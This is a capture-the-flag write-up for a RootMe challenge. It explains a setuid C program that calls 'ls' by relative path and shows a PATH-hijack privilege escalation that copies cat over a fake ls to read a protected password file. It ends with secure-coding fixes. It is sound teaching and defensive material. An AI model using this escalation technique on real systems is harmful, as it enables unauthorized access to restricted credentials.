Understanding the RootMe Challenge

This challenge demonstrates how attackers exploit vulnerable system scripts through command manipulation and privilege escalation. You'll analyze a C program that executes commands with elevated privileges, then manipulate the system environment to trick it into running unintended commands and accessing restricted files.

What You'll Learn

• Privilege Escalation: Exploiting misconfigurations to gain higher-level access (e.g., root) than intended
• Command Manipulation: Altering system behavior by hijacking commands through PATH manipulation
• setreuid(): A system call that sets the real and effective user IDs of a process
• PATH Environment Variable: Controls the order in which the system searches for executables

---

Initial Setup

Connecting to the Challenge Server

Establish an SSH connection to the RootMe challenge server:

ssh -p 2222 app-script-ch11@challenge02.root-me.org

Note: The server uses non-standard port 2222. Ensure your firewall allows outbound connections to this port.

---

Understanding the Vulnerability

The Vulnerable Code

The challenge provides a compiled C program (ch11) with this source code:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /challenge/app-script/ch11/.passwd");
    return 0;
}

Critical Security Flaws

Elevated Privileges

• setreuid(geteuid(), geteuid()) runs the program with the effective user ID of the file owner (likely a privileged user)
• This is common in setuid binaries that temporarily grant elevated permissions

Command Injection Vulnerability

• system() executes commands via /bin/sh, which respects the PATH environment variable
• The program uses a relative path (ls) instead of an absolute path (/bin/ls)
• This allows attackers to hijack the command by manipulating PATH

Security Risk: Any program that uses system() with relative paths is vulnerable to PATH manipulation attacks.

---

Exploitation Walkthrough

Step 1: Verify the Default Command Location

Check where the system finds ls:

which ls

Output: /bin/ls

Step 2: Create a Malicious Command

Create a directory for your fake ls command:

mkdir ~/bin

Copy cat and rename it to ls:

cp /bin/cat ~/bin/ls
chmod +x ~/bin/ls

Step 3: Hijack the PATH Variable

Prepend your directory to PATH so the system finds your fake ls first:

export PATH=~/bin:$PATH

Verify the change:

which ls

Expected Output: /home/app-script-ch11/bin/ls

Step 4: Execute the Vulnerable Script

Run the program:

./ch11

Result: The script executes cat /challenge/app-script/ch11/.passwd instead of ls, revealing the contents of the password file.

---

Troubleshooting Common Issues

Problem	Solution
PATH not updated	Verify with echo $PATH that ~/bin appears first
Permission denied	Ensure ~/bin/ls is executable with chmod +x ~/bin/ls
Script doesn't run	Use ./ch11 to execute from current directory
cat not found	Use absolute path /bin/cat when copying
Changes don't persist	export PATH only affects current shell session

---

Secure Coding Practices

How to Prevent This Vulnerability

Use Absolute Paths

Replace relative commands with absolute paths:

system("/bin/ls /challenge/app-script/ch11/.passwd");

Drop Privileges After Use

Revert to the original user ID after privileged operations:

setreuid(getuid(), getuid());

Avoid system() Entirely

Use safer alternatives like execve() with explicit paths:

char *args[] = {"/bin/ls", "/challenge/app-script/ch11/.passwd", NULL};
execve("/bin/ls", args, NULL);

Sanitize Environment Variables

Reset PATH before executing commands:

setenv("PATH", "/bin:/usr/bin", 1);
system("ls /challenge/app-script/ch11/.passwd");

---

Key Takeaways

• Never trust user-controlled environment variables in privileged programs
• Always use absolute paths when calling external commands
• The system() function is inherently dangerous in setuid programs
• PATH manipulation is a common privilege escalation technique in CTF challenges and real-world scenarios
• Defense in depth: Combine multiple security measures rather than relying on a single control

---

Learn More

Recommended Resources

• RootMe Challenge Platform - Practice more privilege escalation challenges
• Linux Privilege Escalation Guide - Comprehensive techniques and tools
• setreuid() Man Page - Official documentation

Related Challenges

Challenge Name	Focus Area	Difficulty
Bash - System 2	Environment variable manipulation	Medium
Python - Input	Command injection	Easy
C - setuid 0	Buffer overflow + privilege escalation	Hard